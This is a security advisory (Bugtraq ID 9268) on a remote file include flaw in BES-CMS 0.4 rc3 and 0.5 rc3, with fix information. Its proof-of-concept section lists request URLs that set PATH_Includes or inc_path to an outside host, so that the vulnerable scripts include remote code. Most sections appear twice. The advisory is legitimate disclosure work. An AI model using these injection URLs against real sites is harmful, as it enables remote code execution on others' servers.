BES-CMS Multiple Module File Include Vulnerability
BID:9268
Info
BES-CMS Multiple Module File Include Vulnerability
| Bugtraq ID: | 9268 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 20 2003 12:00AM |
| Updated: | Dec 20 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to frog-m@n <[email protected]>. |
| Vulnerable: |
BES-CMS BES-CMS 0.5 rc3 BES-CMS BES-CMS 0.4 rc3 |
| Not Vulnerable: |
BES-CMS BES-CMS 0.5 rc4 |
Discussion
BES-CMS Multiple Module File Include Vulnerability
It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software.
BES-CMS versions 0.4 rc3 and 0.5 rc3 are reported to be vulnerable to this issue, however other versions may be affected as well.
It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software.
BES-CMS versions 0.4 rc3 and 0.5 rc3 are reported to be vulnerable to this issue, however other versions may be affected as well.
Exploit / POC
BES-CMS Multiple Module File Include Vulnerability
The following proof of concept examples have been provided:
http://www.example.com/index.inc.php?PATH_Includes=http://www.example.com/
http://www.example.com/Members/index.inc.php?PATH_Includes=http://www.example.com/
http://www.example.com/Members/root/index.inc.php?PATH_Includes=http://www.example.com/
http://www.example.com/Include/functions_folder.php?PATH_Includes=
http://www.example.com/
http://www.example.com/Include/functions_hacking.php?PATH_Includes=
http://www.example.com/&itemID=usershow
http://www.example.com/Include/functions_message.php?PATH_Includes=
http://www.example.com/
http://www.example.com/Include/Start.php?inc_path=http://www.example/
The following proof of concept examples have been provided:
http://www.example.com/index.inc.php?PATH_Includes=http://www.example.com/
http://www.example.com/Members/index.inc.php?PATH_Includes=http://www.example.com/
http://www.example.com/Members/root/index.inc.php?PATH_Includes=http://www.example.com/
http://www.example.com/Include/functions_folder.php?PATH_Includes=
http://www.example.com/
http://www.example.com/Include/functions_hacking.php?PATH_Includes=
http://www.example.com/&itemID=usershow
http://www.example.com/Include/functions_message.php?PATH_Includes=
http://www.example.com/
http://www.example.com/Include/Start.php?inc_path=http://www.example/
Solution / Fix
BES-CMS Multiple Module File Include Vulnerability
Solution:
The vendor has release BES-CMS 0.5 rc4 to address this issue. Users are advised to download the fixed version.
BES-CMS BES-CMS 0.4 rc3
BES-CMS BES-CMS 0.5 rc3
Solution:
The vendor has release BES-CMS 0.5 rc4 to address this issue. Users are advised to download the fixed version.
BES-CMS BES-CMS 0.4 rc3
-
BES-CMS bes-cms_0.5.4.tar.gz
http://bes.h6p.org/data/downloads/bes-cms_0.5.4.tar.gz
BES-CMS BES-CMS 0.5 rc3
-
BES-CMS bes-cms_0.5.4.tar.gz
http://bes.h6p.org/data/downloads/bes-cms_0.5.4.tar.gz